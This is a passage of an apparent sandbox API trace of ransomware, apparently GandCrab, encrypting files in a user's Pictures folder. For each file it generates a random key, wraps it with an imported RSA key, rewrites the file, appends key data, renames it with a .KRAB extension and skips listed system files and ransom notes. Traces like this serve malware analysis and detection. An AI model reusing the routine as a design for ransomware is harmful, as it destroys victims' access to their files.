(lpModuleName="Advapi32.dll") returned 0x77990000 [0097.055] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.055] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.055] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0097.055] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.055] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011018) returned 1 [0097.056] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.056] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.056] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.056] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.056] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0097.056] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.057] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.057] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.057] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.057] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.058] GetLastError () returned 0x0 [0097.058] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.058] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.058] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0097.058] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.058] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.058] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.059] GetLastError () returned 0x0 [0097.059] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.059] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.059] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\ljxousvot.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.059] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.060] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.060] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x4289, lpOverlapped=0x0) returned 1 [0097.072] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffbd77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.073] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x4289, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x4289, lpOverlapped=0x0) returned 1 [0097.073] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.073] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.077] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.077] CloseHandle (hObject=0x3a8) returned 1 [0097.077] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.077] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\ljxousvot.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\LJxOUSvOT.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\ljxousvot.gif.krab")) returned 1 [0097.078] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.078] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.079] lstrcmpW (lpString1="quMc_.bmp", lpString2=".") returned 1 [0097.079] lstrcmpW (lpString1="quMc_.bmp", lpString2="..") returned 1 [0097.079] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="quMc_.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp" [0097.079] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.079] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp.KRAB") returned 53 [0097.080] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp") returned 48 [0097.080] lstrlenW (lpString=".bmp") returned 4 [0097.080] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.080] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.080] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.080] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp") returned 48 [0097.080] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp") returned 48 [0097.080] lstrcmpiW (lpString1="quMc_.bmp", lpString2="desktop.ini") returned 1 [0097.080] lstrcmpiW (lpString1="quMc_.bmp", lpString2="autorun.inf") returned 1 [0097.080] lstrcmpiW (lpString1="quMc_.bmp", lpString2="ntuser.dat") returned 1 [0097.080] lstrcmpiW (lpString1="quMc_.bmp", lpString2="iconcache.db") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="bootsect.bak") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="boot.ini") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="ntuser.dat.log") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="thumbs.db") returned -1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="ntldr") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="NTDETECT.COM") returned 1 [0097.081] lstrcmpiW (lpString1="quMc_.bmp", lpString2="Bootfont.bin") returned 1 [0097.081] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.081] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10111b0) returned 1 [0097.082] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.082] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.082] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.082] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.082] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0097.083] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.083] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010f08) returned 1 [0097.083] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.084] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.084] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.084] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.084] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0097.084] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.084] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011678) returned 1 [0097.085] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.085] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.085] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.085] GetLastError () returned 0x0 [0097.085] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.085] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.085] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.086] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.086] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.086] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.086] GetLastError () returned 0x0 [0097.086] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.086] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.086] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\qumc_.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.087] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.087] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.088] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x5e2d, lpOverlapped=0x0) returned 1 [0097.101] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffa1d3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.101] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5e2d, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x5e2d, lpOverlapped=0x0) returned 1 [0097.101] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.101] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.105] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.105] CloseHandle (hObject=0x3a8) returned 1 [0097.106] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.106] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\qumc_.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\quMc_.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\qumc_.bmp.krab")) returned 1 [0097.107] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.107] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.107] lstrcmpW (lpString1="QYMz4STC1xQ.bmp", lpString2=".") returned 1 [0097.107] lstrcmpW (lpString1="QYMz4STC1xQ.bmp", lpString2="..") returned 1 [0097.107] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="QYMz4STC1xQ.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp" [0097.107] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.108] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp.KRAB") returned 59 [0097.108] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp") returned 54 [0097.108] lstrlenW (lpString=".bmp") returned 4 [0097.108] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.108] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.108] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.108] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp") returned 54 [0097.108] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp") returned 54 [0097.108] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="desktop.ini") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="autorun.inf") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="ntuser.dat") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="iconcache.db") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="bootsect.bak") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="boot.ini") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="ntuser.dat.log") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="thumbs.db") returned -1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="ntldr") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="NTDETECT.COM") returned 1 [0097.109] lstrcmpiW (lpString1="QYMz4STC1xQ.bmp", lpString2="Bootfont.bin") returned 1 [0097.109] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.109] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.110] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.111] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.111] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.111] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.111] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.111] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.111] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.112] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.112] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.113] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.113] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.113] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.113] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.113] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.113] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.114] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.114] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.114] GetLastError () returned 0x0 [0097.114] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.114] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.114] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10114e0) returned 1 [0097.114] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.115] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.115] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.115] GetLastError () returned 0x0 [0097.115] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.115] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.115] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\qymz4stc1xq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.116] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.116] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.116] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x94da, lpOverlapped=0x0) returned 1 [0097.129] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff6b26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.129] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x94da, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x94da, lpOverlapped=0x0) returned 1 [0097.130] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.130] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.134] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.134] CloseHandle (hObject=0x3a8) returned 1 [0097.134] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.135] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\qymz4stc1xq.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\QYMz4STC1xQ.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\qymz4stc1xq.bmp.krab")) returned 1 [0097.136] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.136] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.136] lstrcmpW (lpString1="s9qnpo.gif", lpString2=".") returned 1 [0097.136] lstrcmpW (lpString1="s9qnpo.gif", lpString2="..") returned 1 [0097.136] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="s9qnpo.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif" [0097.136] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.136] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif.KRAB") returned 54 [0097.136] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif") returned 49 [0097.137] lstrlenW (lpString=".gif") returned 4 [0097.137] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.137] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.137] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif") returned 49 [0097.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif") returned 49 [0097.137] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="desktop.ini") returned 1 [0097.137] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="autorun.inf") returned 1 [0097.137] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="ntuser.dat") returned 1 [0097.137] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="iconcache.db") returned 1 [0097.137] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="bootsect.bak") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="boot.ini") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="ntuser.dat.log") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="thumbs.db") returned -1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="ntldr") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", lpString2="NTDETECT.COM") returned 1 [0097.138] lstrcmpiW (lpString1="s9qnpo.gif", 